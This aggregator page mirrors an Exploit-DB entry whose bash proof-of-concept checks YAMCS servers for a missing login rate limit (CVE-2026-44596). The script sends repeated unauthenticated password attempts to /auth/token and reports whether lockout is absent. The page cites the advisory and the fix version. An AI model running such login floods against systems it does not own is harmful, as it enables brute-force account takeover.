YAMCS yamcs-core 5.12.7 – No Rate Limiting_EDB-ID:52605

Description

Exploit Title: YAMCS yamcs-core 5.12.7 - No Rate Limiting Date: 2026-05-27 Exploit Author: Daniel Miranda Barcelona Excal1bur Vendor Homepage: https://yamcs.org Software Link: https://github.com/yamcs/yamcs Version: 5.12.7 Tested on: Linux CVE:...

Visit Original Source

Basic Information

ID EDB-ID:52605

Published May 30, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: YAMCS yamcs-core 5.12.7 - No Rate Limiting
# Date: 2026-05-27
# Exploit Author: Daniel Miranda Barcelona (Excal1bur)
# Vendor Homepage: https://yamcs.org
# Software Link: https://github.com/yamcs/yamcs
# Version: < 5.12.7
# Tested on: Linux
# CVE: CVE-2026-44596
# Category: Remote / Brute Force
# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4

#!/bin/bash
# ============================================================
# CVE-2026-44596 — YAMCS No Rate Limiting on /auth/token
# ============================================================
# Vulnerability: POST /auth/token accepts unlimited login
# attempts with no rate limiting or lockout.
# Impact: Unauthenticated brute-force of any account.
# Affected: yamcs-core < 5.12.7
# Fixed in: yamcs-core 5.12.7
# CWE: CWE-307
# CVSS: 5.3 MEDIUM
# ============================================================
# Usage: ./poc.sh [target] [username] [attempts]
# Example: ./poc.sh http://localhost:8090 operator 20
# ============================================================

TARGET="${1:-http://localhost:8090}"
USERNAME="${2:-operator}"
ATTEMPTS="${3:-20}"
LAST_STATUS=""

echo "============================================================"
echo " CVE-2026-44596 — YAMCS No Rate Limiting PoC"
echo " Target: $TARGET"
echo " Username: $USERNAME"
echo " Attempts: $ATTEMPTS"
echo "============================================================"
echo ""
echo "[*] Sending $ATTEMPTS unauthenticated login attempts..."
echo "[*] Vulnerable: HTTP 401 every time, never HTTP 429"
echo ""

for i in $(seq 1 $ATTEMPTS); do
RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "$TARGET/auth/token" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "grant_type=password&username=$USERNAME&password=wrongpass$i")

echo " Attempt $i/$ATTEMPTS: HTTP $RESPONSE"
LAST_STATUS=$RESPONSE

if [ "$RESPONSE" = "429" ]; then
echo ""
echo "[+] HTTP 429 received — rate limiting active (PATCHED)"
exit 0
fi

if [ "$RESPONSE" = "200" ]; then
echo ""
echo "[!!!] HTTP 200 — credentials found at attempt $i"
exit 0
fi
done

echo ""
if [ "$LAST_STATUS" = "401" ]; then
echo "[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected"
echo "[!!!] Brute-force possible without restriction"
fi

echo ""
echo "============================================================"
echo " Fix: Upgrade to yamcs-core >= 5.12.7"
echo "============================================================"

{
    "lastseen": "2026-05-30T15:32:49",
    "description": "Exploit Title: YAMCS yamcs-core 5.12.7 - No Rate Limiting Date: 2026-05-27 Exploit Author: Daniel Miranda Barcelona Excal1bur Vendor Homepage: https://yamcs.org Software Link: https://github.com/yamcs/yamcs Version: 5.12.7 Tested on: Linux CVE:...",
    "published": "2026-05-30T00:00:00",
    "modified": "2026-05-30T00:00:00",
    "type": "exploitdb",
    "title": "YAMCS yamcs-core  5.12.7 - No Rate Limiting",
    "source": "",
    "references": "",
    "id": "EDB-ID:52605",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-44596"
    ],
    "sourceData": "# Exploit Title: YAMCS yamcs-core  5.12.7 - No Rate Limiting \r\n# Date: 2026-05-27\r\n# Exploit Author: Daniel Miranda Barcelona (Excal1bur)\r\n# Vendor Homepage: https://yamcs.org\r\n# Software Link: https://github.com/yamcs/yamcs\r\n# Version: < 5.12.7\r\n# Tested on: Linux\r\n# CVE: CVE-2026-44596\r\n# Category: Remote / Brute Force\r\n# Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4\r\n\r\n#!/bin/bash\r\n# ============================================================\r\n# CVE-2026-44596 \u2014 YAMCS No Rate Limiting on /auth/token\r\n# ============================================================\r\n# Vulnerability: POST /auth/token accepts unlimited login\r\n#                attempts with no rate limiting or lockout.\r\n# Impact:        Unauthenticated brute-force of any account.\r\n# Affected:      yamcs-core < 5.12.7\r\n# Fixed in:      yamcs-core 5.12.7\r\n# CWE:           CWE-307\r\n# CVSS:          5.3 MEDIUM\r\n# ============================================================\r\n# Usage: ./poc.sh [target] [username] [attempts]\r\n# Example: ./poc.sh http://localhost:8090 operator 20\r\n# ============================================================\r\n\r\nTARGET=\"${1:-http://localhost:8090}\"\r\nUSERNAME=\"${2:-operator}\"\r\nATTEMPTS=\"${3:-20}\"\r\nLAST_STATUS=\"\"\r\n\r\necho \"============================================================\"\r\necho \" CVE-2026-44596 \u2014 YAMCS No Rate Limiting PoC\"\r\necho \" Target:   $TARGET\"\r\necho \" Username: $USERNAME\"\r\necho \" Attempts: $ATTEMPTS\"\r\necho \"============================================================\"\r\necho \"\"\r\necho \"[*] Sending $ATTEMPTS unauthenticated login attempts...\"\r\necho \"[*] Vulnerable: HTTP 401 every time, never HTTP 429\"\r\necho \"\"\r\n\r\nfor i in $(seq 1 $ATTEMPTS); do\r\n    RESPONSE=$(curl -s -o /dev/null -w \"%{http_code}\" \\\r\n        -X POST \"$TARGET/auth/token\" \\\r\n        -H \"Content-Type: application/x-www-form-urlencoded\" \\\r\n        -d \"grant_type=password&username=$USERNAME&password=wrongpass$i\")\r\n\r\n    echo \"  Attempt $i/$ATTEMPTS: HTTP $RESPONSE\"\r\n    LAST_STATUS=$RESPONSE\r\n\r\n    if [ \"$RESPONSE\" = \"429\" ]; then\r\n        echo \"\"\r\n        echo \"[+] HTTP 429 received \u2014 rate limiting active (PATCHED)\"\r\n        exit 0\r\n    fi\r\n\r\n    if [ \"$RESPONSE\" = \"200\" ]; then\r\n        echo \"\"\r\n        echo \"[!!!] HTTP 200 \u2014 credentials found at attempt $i\"\r\n        exit 0\r\n    fi\r\ndone\r\n\r\necho \"\"\r\nif [ \"$LAST_STATUS\" = \"401\" ]; then\r\n    echo \"[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected\"\r\n    echo \"[!!!] Brute-force possible without restriction\"\r\nfi\r\n\r\necho \"\"\r\necho \"============================================================\"\r\necho \" Fix: Upgrade to yamcs-core >= 5.12.7\"\r\necho \"============================================================\"",
    "sourceHref": "https://www.exploit-db.com/raw/52605",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52605",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply